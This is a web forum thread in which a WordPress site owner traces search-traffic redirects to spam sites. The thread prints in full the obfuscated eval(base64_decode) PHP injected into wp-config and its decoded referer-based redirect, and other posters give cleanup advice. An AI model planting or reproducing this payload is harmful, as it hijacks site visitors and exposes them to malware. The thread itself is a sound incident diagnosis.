Webpage being directed to SPAM

Hi guys,

I have an issue, but open closer inspection the issue might be a browser related.

I am not entirely sure what’s happening on my site, but I seam to get redirected from the site on Google to another site called “http://monkeyball.osa.pl/?said=3333g&q=corporate+identity+cyprus”. If you type Cyprus Corporate Identity you get my site near the top, it’s with a PricklyPear. From here, on my browser anyhow I get directed to this spam site. It was happening before when I set the site to Multisite.

Can anybody let me know why this is happening? I myself think it might be a browser related issue, maybe on outside machines something else happens.

I’ve just tried that using Yahoo! (because I wasn’t paying attention to what I was doing :slight_smile: ) and your site came up top. Clicking on the link got me

Oops! Google Chrome could not find aruba.345.pl

345.pl and osa.pl both have very poor ratings on WOT; McAfee site advisor hasn’t ranked the first one, but about the second it says:

McAfee TrustedSource web reputation analysis found potential security risks with this site. Use with extreme caution.
I don’t know what’s going on, but it seems pretty safe to say it’s not an issue with your browser. :slight_smile:

That makes things even worse! Can anybody assist me on this. I use Site5 as my host, I can probably flag the issue up with them, but maybe it would be good to see what people say here before I do anything.

OK - I tried again with Google and a different browser, and I got this:

I have no problem if I visit the site direct, so I don’t know what’s going on here.

Aruba is not my website though. This is another website. I am going to have to flag this up to the hosts. I have no idea whats going on.

Sorry - I meant I can visit pricklypear direct without any problems.

I know the site can be visited directly without any issue. I am on LIVE chat with the hosting company and seeing what they can do, if anything. I am really unsure what’s going on, it’s all very strange.

Strange - I’ve tried with several browsers and Google is sending me to pricklypear as it should do, nothing dodgy at all.

Something is up. Ran a search on Google and when visiting your homepage I get:

Warning: Something’s Not Right Here!
www3.bestscannerfyn.rr.nu contains malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified www3.bestscannerfyn.rr.nu that we found malware on the site. For more about the problems found on www3.bestscannerfyn.rr.nu, visit the Google Safe

The other pages I clicked are redirecting to something weird as well. What does the host say?

I’d say the site has been compromised.

Nothing at the moment. The lady opened a ticket to flag up to the Technical team, I am unsure what they will say. Aren’t hosts suppose to protect against this thing? I feel something is playing in the domain name. I did a virus scam and it checked all the files and they seamed to be okay, I am not sure what else to do. I am using WP as the site suggests. I use a CDN but I don’t think that’s doing anything bad.

The word in from the host.

The hosts are really amazing, they eventually found the issue and cause of the problem.


eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb 2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ=="));

was found on the top of the wp-config file.

This translates to:


error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\\.ru\\/yandsearch\\?(.*?)\\&lr\\=/",$referer) or preg_match ("/google\\.(.*?)\\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: [B]http://broadway.bee.pl/[/B]");
exit();

This made my website marked as SPAM! Apart from being listed on the top rank for Cyprus Corporate Identity I would be shunning business away with this spam. My host gave me excellent advice on keeping my WP installation and virus free. I feel this malicious code was part of an plug-in to do with social media.

I will think twice before I see any base code on my site!

I have found nothing on Google about this malicious code, so I hope this thread can be found by many to resolve an issue which took all day to resolve. Thanks again, and I am glad my site is now back to normal few

I just wanted to check and make sure this got resolved ok? Our support would be happy to help,

Thanks, Ben
Site5 CEO

The issue was resolved, they did a brilliant job. The actual issue was a line of code which created the redirect.

I did something else when putting the security plug-ins which caused another issue and now I can’t log onto the CMS. I will try to solve this, if push comes to shove I will probably recreate the blog since I have the backups. I really don’t want to ask your team to help again, they did an amazing job and it’s not fair for me to ask for their help on my inexperience.

Kind regards,

I’m glad to hear they could help! Don’t worry that is what we are for if you need help :slight_smile:

Thanks, Ben

I just had a similar issue with one of my hosted customers but the issue didn’t stop at just the wp-config file. In fact, they injected this code into several dozen of my files scattered throughout.

The best way to identify the files that contain this code is to look at the timestamp or date of modification on each file containing the code snippet. Each file had exactly the same time and date, which made it obvious for me to see which files were modified to contain this injected script.

All the basic wordpress files I simply uploaded over again using a clean Wordpress install, but the wp-config and wp-content folders took some time to go through manually. They must have had some automated method of adding this to files because they were all at exactly the same time but also so many files were infected… I didn’t see any obvious areas, but this was injected into plugin and theme files without discrimination.

It’s a time consuming one to fix, but once you’re done… you are good to go. Hope this helps.

Since then I’ve done loads to prevent hacks. SSL certification all around, bulletproofing my WP installation. This might have been my website, but it would have been much worse if it was on a clients site. Relatively easy to setup.

@dr00t;

Your examples was far worse than mine, so I feel for you. What steps do you now take to prevent such a re occurrence.